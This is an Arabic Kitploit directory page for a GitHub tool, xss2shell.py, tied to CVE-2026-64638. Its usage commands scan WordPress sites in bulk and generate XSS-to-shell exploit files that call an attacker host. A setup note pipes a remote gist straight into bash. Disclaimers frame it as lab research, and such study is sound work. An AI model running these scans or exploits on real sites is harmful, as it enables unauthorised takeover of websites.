Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/horkimhab/cve-2026-64638
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubhorkimhab/cve-2026-64638

CVE-2026-64638

CVE-2026-64638 - مسودة أو TODO

عرض المستودع
4منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-64638

تبرع

ادعم صيانة هذا المشروع عبر PayPal أو بمسح رمز الاستجابة السريعة أدناه.

paypal

رمز الاستجابة السريعة للتبرع

⚡ الاستخدام البسيط

استخدم هذا المشروع فقط في بيئات آمنة ومرخّص بها مثل:

  • الأجهزة الافتراضية المحلية
  • حاويات Docker
  • إعدادات المختبرات المعزولة
  • بيئات اختبار الاختراق المرخّصة

مثال على الإعداد:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

مثال على الاستخدام:

root@kitploit:~
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:

# Scan a single URL
python xss2shell.py scan http://wp-vm.local

# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt

# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json

# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local

# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/

# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator

ملاحظة:

  • عند الاستنساخ من مشروع آخر، يجب تشغيل curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y لإزالة مجلد .git المتداخل
  • على سبيل المثال: cve-2025-46822.sh، cve-2025-46822-lab.sh، ...

الائتمان أو المرجع

  • https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
  • https://pwn.ai/blog/xss2shell

📚 مستودع أبحاث أمن المعلومات التعليمي

مستودع للتعلّم والاختبار والبحث في مفاهيم الأمن السيبراني في بيئات خاضعة للتحكم.


⚠️ إخلاء المسؤولية الأمني والقانوني

الغرض

هذا المستودع مخصّص لأغراض البحث الأمني التعليمي والمرخّص فقط.

صُمم لمساعدة المستخدمين على التعلّم حول:

  • الثغرات الأمنية
  • مفاهيم العزل والـ Sandbox
  • ممارسات الترميز الآمن والممارسات الدفاعية

الاستخدام المرخّص فقط

استخدم هذا المستودع فقط في البيئات التي لديك إذن باستخدامها، مثل:

  • المختبرات الشخصية أو الأجهزة الافتراضية
  • بيئات Docker أو البيئات المعزولة
  • اختبار الاختراق المرخّص
  • التدريب على الأمن السيبراني أو البحث الأكاديمي

الاستخدام غير المرخّص أو غير القانوني محظور تمامًا.


عدم المسؤولية

المؤلف والمساهمون غير مسؤولين عن أي ضرر أو إساءة استخدام أو مشكلات قانونية أو خسائر ناتجة عن هذا المشروع.

باستخدامك لهذا المستودع، فإنك توافق على أن:

  • أنت مسؤول عن أفعالك
  • ستستخدمه بشكل قانوني وأخلاقي
  • المشروع مقدَّم بدون أي ضمان

الاستخدام الأخلاقي

هذا المشروع مخصّص لـ:

  • أبحاث الأمن الدفاعي
  • التعليم في مجال الأمن السيبراني
  • التوعية بالثغرات
  • أبحاث الأنظمة والبرمجيات الآمنة

يرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.


الاتصال

للإفصاح المسؤول أو التعاون، تواصل مع القائم على صيانة المستودع عبر GitHub.

تنزيل الأداة